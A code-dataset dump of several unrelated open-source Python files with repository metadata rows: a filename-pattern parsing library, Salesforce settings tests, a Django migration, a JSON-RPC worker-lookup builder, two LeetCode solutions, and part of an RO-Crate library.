Returns:
Iterable that returns a list of files with matching variables
"""
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
"""Parse data in a directory
This is where all the logic for the parsing the data should live. It
must return a nested dictionary in the same format as
:any:`parse_directory`.
Args:
file_path: Path to target file directory to parse
Returns:
A nested dictionary of file dictionaries
"""
def output_name(self,files:typing.List[dict] = []) -> str:
"""Determine an output name for a list of files
See the :any:`output_name` method for more details.
This method uses the ``filepattern`` used to initialize the object to
determine an output file name that summarizes the range of variables
included in the ``file_path`` list of dictionaries. If ``file_path`` is
empty, this method returns an output file name that summarizes the range
of all variables parsed by the object.
Args:
files: A list of file dictionaries
Returns:
An output file name
"""
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
# Get filenames matching values for specified variables
def get_matching(self,**kwargs):
""" Get all filenames matching specific values
This function runs the get_matching function using the objects file
dictionary. For more information, see :any:`get_matching`.
Args:
**kwargs: One of :any:`VARIABLES`, must be uppercase, can be single
values or a list of values
Returns:
A list of all files matching the input values
"""
# get matching files
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
# If self.files is a list, no parsing took place so just loop through the files
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
# Generate the values to iterate through
iter_vars = {}
for v in self.var_order:
# Proceed to the next variable if v is not a grouping variable
if v in group_by:
continue
# Check to see if the current variable has a matching value
elif v.upper() in kwargs.keys():
# If the value is a list, then we copy the list since we modify
# it later
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
# If the value is not a list, turn it into a list for consistent
# access when looping over values
else:
iter_vars[v] = [kwargs[v.upper()]]
# If the variable is neither in group_by or kwargs, just copy the
# dictionary or list since it gets modified later
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
# Find the shallowest variable in the dictionary structure
# Shallowest means the variable containing the list of file dictionaries
shallowest = None
for v in iter_vars.keys():
# -1 indicates the variable doesn't exist in the file names
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
""" Main class for handling filename patterns
Most of the functions in filepattern.py return complicated variable
structures that might be difficult to use in an abstract way. This class
provides tools to use the above functions in a simpler way. In particular,
the iterate function is an iterable that permits simple iteration over
filenames with specific values and grouped by any desired variable.
"""
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
"""Parse data in a directory
In the future, this function will parse data from a directory, and add
it to the existing dictionary if it exists. For more information on how
this method works, see :any:`parse_directory`.
Args:
file_path: Path to target file directory to parse
Returns:
A nested dictionary of file dictionaries
"""
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
""" Main class for handling stitching vectors
This class works nearly identically to :any:`FilePattern`, except it works
with lines inside of a stitching vector. As with FilePattern, the iterate
method will iterate through values, which in the case of VectorPattern are
parsed lines of a stitching vector.
Note:
One major difference between this class and :any:`FilePattern` is that
the ``file`` values in the file dictionaries contain strings rather than
``pathlib.Path`` objects.
"""
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
"""Parse data in a directory
In the future, this function will parse data from a directory, and add
it to the existing dictionary if it exists. For more information on how
this method works, see :any:`parse_vector`.
Args:
file_path: Path to target stitching vector to parse
Returns:
A nested dictionary of file dictionaries
"""
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order) | 38.478723 | 126 | 0.589531 | import copy, pathlib, typing, abc
from filepattern.functions import get_regex, get_matching, parse_directory, \
parse_vector, logger, VARIABLES, output_name, \
_parse, parse_filename
class PatternObject():
def __init__(self,
file_path: typing.Union[pathlib.Path,str],
pattern: str,
var_order: str = "rtczyxp"):
self.files = {}
self.uniques = {}
self._kwargs = None
self._group_by = None
self.pattern = pattern
self.regex, self.variables = get_regex(pattern)
self.path = file_path
self.var_order = var_order
self.var_order = "".join([v for v in self.var_order if v in self.variables])
self.files, self.uniques = self.parse_data(file_path)
def __call__(self,group_by: list = [],**kwargs) -> typing.Iterable[typing.List[dict]]:
self._group_by = group_by
self._kwargs = kwargs
return self
@abc.abstractmethod
def parse_data(self,file_path: str) -> dict:
def output_name(self,files:typing.List[dict] = []) -> str:
if len(files) == 0:
files = self.files
files = get_matching(files,self.var_order,**{k.upper():v for k,v in self.uniques.items()})
vals = {v:set() for v in self.var_order}
for file in files:
for k,v in file.items():
if k not in self.var_order:
continue
vals[k].add(v)
kwargs = {}
for k,v in vals.items():
v = list(v)
if len(v) == 1 and v[0] != -1:
kwargs[k] = v[0]
return output_name(self.pattern,files,kwargs)
def get_matching(self,**kwargs):
files = get_matching(self.files,self.var_order,out_var=None,**kwargs)
return files
def __iter__(self):
group_by = self._group_by
kwargs = self._kwargs
self._group_by = None
self._kwargs = None
if kwargs == None:
kwargs = {}
if group_by == None:
group_by = ''
if isinstance(self.files,list):
for f in self.files:
yield [f]
return
iter_vars = {}
for v in self.var_order:
if v in group_by:
continue
elif v.upper() in kwargs.keys():
if isinstance(kwargs[v.upper()],list):
iter_vars[v] = copy.deepcopy(kwargs[v.upper()])
else:
iter_vars[v] = [kwargs[v.upper()]]
else:
iter_vars[v] = copy.deepcopy(self.uniques[v])
shallowest = None
for v in iter_vars.keys():
if -1 in iter_vars[v] and len(iter_vars[v]):
continue
else:
shallowest = v
break
# If shallowest is undefined, return all file names since no variables
# were found in any of the file names
if shallowest == None:
yield get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
return
# Loop through every combination of files
while len(iter_vars[shallowest])>0:
# Get list of filenames and return as iterator
iter_files = []
iter_files = get_matching(self.files,self.var_order,**{key.upper():iter_vars[key][0] for key in iter_vars.keys()})
if len(iter_files)>0:
yield iter_files
# Delete last iteration indices
for v in reversed(self.var_order):
if v in group_by:
continue
del iter_vars[v][0]
if len(iter_vars[v])>0:
break
elif v == shallowest:
break
iter_vars[v] = copy.deepcopy(self.uniques[v])
class FilePattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]) -> dict:
return parse_directory(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order)
class VectorPattern(PatternObject):
def parse_data(self,file_path: typing.Union[pathlib.Path,str]):
return parse_vector(file_path,regex=self.regex,variables=self.variables,var_order=self.var_order) | true | true |
f718f7738c7e7e56290c2c143c5634263a7cef6f | 2,697 | py | Python | cumulusci/tasks/preflight/tests/test_settings.py | atrancandoris/CumulusCI | cc468ea315af2dd8c11b67f9316af65530d0f4bc | [
"BSD-3-Clause"
] | 1 | 2020-12-04T10:29:31.000Z | 2020-12-04T10:29:31.000Z | cumulusci/tasks/preflight/tests/test_settings.py | ThierryFeltin/CumulusCI | 80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14 | [
"BSD-3-Clause"
] | null | null | null | cumulusci/tasks/preflight/tests/test_settings.py | ThierryFeltin/CumulusCI | 80fece4ea526c3c531fbb3fd9a8ec56e6fa80d14 | [
"BSD-3-Clause"
] | null | null | null | from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| 23.867257 | 121 | 0.599184 | from cumulusci.tasks.preflight.settings import CheckSettingsValue
from cumulusci.tasks.salesforce.tests.util import create_task
from simple_salesforce.exceptions import SalesforceMalformedRequest
import pytest
import responses
JSON_RESPONSE = {
"records": [{"IntVal": 3, "FloatVal": 3.0, "BoolVal": True, "StringVal": "foo"}],
"done": True,
"totalSize": 1,
}
@responses.activate
@pytest.mark.parametrize(
"settings_field,value,outcome",
[
("IntVal", 3, True),
("FloatVal", 3.0, True),
("BoolVal", "true", True),
("StringVal", "foo", True),
("StringVal", "bad", False),
],
)
def test_check_settings(settings_field, value, outcome):
responses.add(
"GET",
f"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+{settings_field}+FROM+ChatterSettings",
json=JSON_RESPONSE,
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": settings_field,
"value": value,
},
)
task()
assert task.return_values is outcome
@responses.activate
def test_check_settings__no_settings():
responses.add(
"GET",
"https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Foo+FROM+ChatterSettings",
json={"records": []},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "ChatterSettings",
"settings_field": "Foo",
"value": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__failure():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
"treat_missing_as_failure": True,
},
)
task()
assert task.return_values is False
@responses.activate
def test_check_settings__exception():
responses.add(
"GET",
status=400,
url="https://test.salesforce.com/services/data/v50.0/tooling/query/?q=SELECT+Test+FROM+NoSettings",
json={},
)
task = create_task(
CheckSettingsValue,
{
"settings_type": "NoSettings",
"settings_field": "Test",
"value": True,
},
)
with pytest.raises(SalesforceMalformedRequest):
task()
assert task.return_values is False
| true | true |
f718f9f194730e615e7ec9ce3e7cb3a576ea5bd8 | 264 | py | Python | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | text/_cascade/_typing/_dimension.py | jedhsu/text | 8525b602d304ac571a629104c48703443244545c | [
"Apache-2.0"
] | null | null | null | """
Dimension
"""
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| 12 | 33 | 0.734848 |
from abc import ABCMeta
from dataclasses import dataclass
__all__ = ["Dimension"]
from .numeric import Number
from ._unit import UnitMeasure
@dataclass
class Dimension:
__metaclass__ = ABCMeta
number: Number
unit: UnitMeasure
| true | true |
f718fa636465cb39461b7969d2924c94c71ba30c | 814 | py | Python | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | 3 | 2021-07-29T16:27:49.000Z | 2021-11-12T15:39:42.000Z | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | null | null | null | payment/migrations/0012_webhookevent.py | botent/django-stripe-paypal | 3a768a6c45913513197f4f6b7044223ae96db716 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-09-21 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| 33.916667 | 117 | 0.608108 |
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('payment', '0011_alter_paymentorder_name'),
]
operations = [
migrations.CreateModel(
name='WebhookEvent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('customer_id', models.CharField(max_length=200, verbose_name='Customer ID')),
('event_type', models.CharField(max_length=200, verbose_name='Event Type')),
('data_obj', models.JSONField(verbose_name='Data Object')),
('event_info', models.JSONField(verbose_name='Full Event Data')),
],
),
]
| true | true |
f718fa9de893038d5ae56ecc48f2dcaf85abea50 | 2,969 | py | Python | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/src/worker_lookup/worker_lookup_params.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| 31.924731 | 77 | 0.613675 |
import json
import logging
logger = logging.getLogger(__name__)
class WorkerLookUp():
def __init__(self):
self.id_obj = {"jsonrpc": "2.0", "method": "WorkerLookUp", "id": 1}
self.params_obj = {}
self.request_mode = "file"
self.tamper = {"params": {}}
self.output_json_file_name = "worker_lookup"
def add_json_values(self, input_json_temp, tamper):
if "workerType" in input_json_temp["params"].keys():
if input_json_temp["params"]["workerType"] != "":
self.set_worker_type(input_json_temp["params"]["workerType"])
else:
self.set_worker_type(1)
if "id" in input_json_temp.keys():
self.set_request_id(input_json_temp["id"])
for key in tamper["params"].keys():
param = key
value = tamper["params"][key]
self.set_unknown_parameter(param, value)
def set_unknown_parameter(self, param, value):
self.params_obj[param] = value
def set_worker_type(self, worker_type):
self.params_obj["workerType"] = worker_type
def set_request_id(self, request_id):
self.id_obj["id"] = request_id
def get_params(self):
return self.params_obj.copy()
def to_string(self):
json_rpc_request = self.id_obj
json_rpc_request["params"] = self.get_params()
return json.dumps(json_rpc_request, indent=4)
def configure_data(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
self.set_worker_type(1)
else:
self.add_json_values(input_json, self.tamper)
final_json = json.loads(self.to_string())
return final_json
def configure_data_sdk(
self, input_json, worker_obj, pre_test_response):
if input_json is None:
worker_type = 'SGX'
else:
try:
worker_value = input_json["params"]["workerType"]
if worker_value == 1:
worker_type = 'SGX'
elif worker_value == 2:
worker_type = 'MPC'
elif worker_value == 3:
worker_type = 'ZK'
else:
worker_type = worker_value
except LookupError:
worker_type = ""
return worker_type
| true | true |
f718fb16220b88d0cf774ed5e6300836f3128f5c | 1,055 | py | Python | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | solutions/sliding_window_maximum/solution.py | ansonmiu0214/dsa-worked-solutions | 88801d268b78506edd77e771c29b4c9f4ae0f59a | [
"MIT"
] | null | null | null | from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
"""Return the max sliding window of size 'k' on 'nums'."""
maxWindow = []
# Keep track of the indices of the 'max' candidates.
# Elements are guaranteed to be in decreasing order.
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
# Discard any maximum values not in scope of the window.
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# Discard any values smaller than 'num', as they won't be
# considered 'max candidates since 'num' is larger and also
# in the same window scope.
maxIdxs.pop()
maxIdxs.append(i)
# Sliding window for 'nums' begin at index 'k-1', i.e. where
# the window sees the first 'k' numbers.
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow | 31.969697 | 71 | 0.602844 | from collections import deque
from typing import List
def maxSlidingWindow(nums: List[int], k: int) -> List[int]:
maxWindow = []
maxIdxs = deque([0])
for i, num in enumerate(nums):
leftBoundary = i - k
while maxIdxs and maxIdxs[0] <= leftBoundary:
maxIdxs.popleft()
while maxIdxs and num >= nums[maxIdxs[-1]]:
# considered 'max candidates since 'num' is larger and also
maxIdxs.pop()
maxIdxs.append(i)
if i >= k - 1:
maxWindow.append(nums[maxIdxs[0]])
return maxWindow | true | true |
f718fb322a11e301def104bf6bbcf5c5efdc385b | 1,066 | py | Python | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | 1 | 2020-12-02T13:54:30.000Z | 2020-12-02T13:54:30.000Z | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | null | null | null | algorithms/648. Replace Words.py | woozway/py3-leetcode | e51a9ce7a6bb3e35c0fcb8c8f4f6cd5763708dbf | [
"MIT"
] | null | null | null | """
1. Clarification
2. Possible solutions
- Prefix Hash
- Trie
3. Coding
4. Tests
"""
# T=O(sigma(wi^2)), S=O(n), wi=len(i-th word)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
# T=O(n), S=O(n)
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| 26.65 | 72 | 0.54878 |
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
for i in range(1, len(word)):
if word[:i] in rootset:
return word[:i]
return word
rootset = set(dictionary)
return ' '.join(map(replace, sentence.split()))
class Solution:
def replaceWords(self, dictionary: List[str], sentence: str) -> str:
def replace(word):
cur = trie
for letter in word:
if letter not in cur or END in cur: break
cur = cur[letter]
return cur.get(END, word)
Trie = lambda: collections.defaultdict(Trie)
trie = Trie()
END = True
for root in dictionary:
functools.reduce(dict.__getitem__, root, trie)[END] = root
return ' '.join(map(replace, sentence.split()))
| true | true |
f718fb6285f131a554f6e66796002cf04bdb687c | 16,091 | py | Python | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | rocrate/rocrate.py | sourav0220/ro-crate-py | e279fc7ddf188f0b22b671ab9c670f3333b477e1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
# TODO: add this as @base in the context? At least when loading
# from zip
self.uuid = uuid.uuid4()
# TODO: default_properties must include name, description,
# datePublished, license
if not source_path or not load_preview:
# create preview entity and add it to default_entities
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
# create a new ro-crate
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
# load an existing ro-crate
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
# TODO: load root dataset properties
def entities_from_metadata(self, metadata_path):
# Creates a dictionary {id: entity} from the metadata file
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
# TODO: should validate the json-ld
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
# print(entity)
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
"""Find Metadata file and Root Data Entity in RO-Crate.
Returns a tuple of the @id identifiers (metadata, root)
"""
# Note that for all cases below we will deliberately
# throw KeyError if "about" exists but it has no "@id"
# First let's try conformsTo algorithm in
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
# add data and contextual entities to the crate
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
# remove hasPart and id from root_entity and add the rest of the
# properties to the build
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
# check if a preview is present
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
# iterate over data entities
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
# print(data_entity_id)
entity = entities[data_entity_id]
# basic checks should be moved to a separate function
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
# Data entities can have an array as @type. So far we just parse
# them as File class if File is in the list. For further
# extensions (e.g if a Workflow class is created) we can add extra
# cases or create a mapping table for specific combinations. See
# https://github.com/ResearchObject/ro-crate/issues/83
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
# referencing a file path relative to crate-root
instance = File(self, file_path, identifier, properties=entity)
else:
# check if it is a valid absolute URI
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
# the rest of the entities must be contextual entities
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
# should this be done in the extract entities?
entity.pop('@id', None)
# contextual entities should not have @type array
# (see https://github.com/ResearchObject/ro-crate/issues/83)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
# TODO: add contextual entities
# def add_contact_point(id, properties = {})
# def add_organization(id, properties = {})
# add properties: name datePublished author license identifier
# distribution contactPoint publisher funder description url hasPart.
# publisher should be an Organization though it MAY be a Person. funder
# should reference an Organization
@property
def name(self):
return self.root_dataset['name']
@name.setter
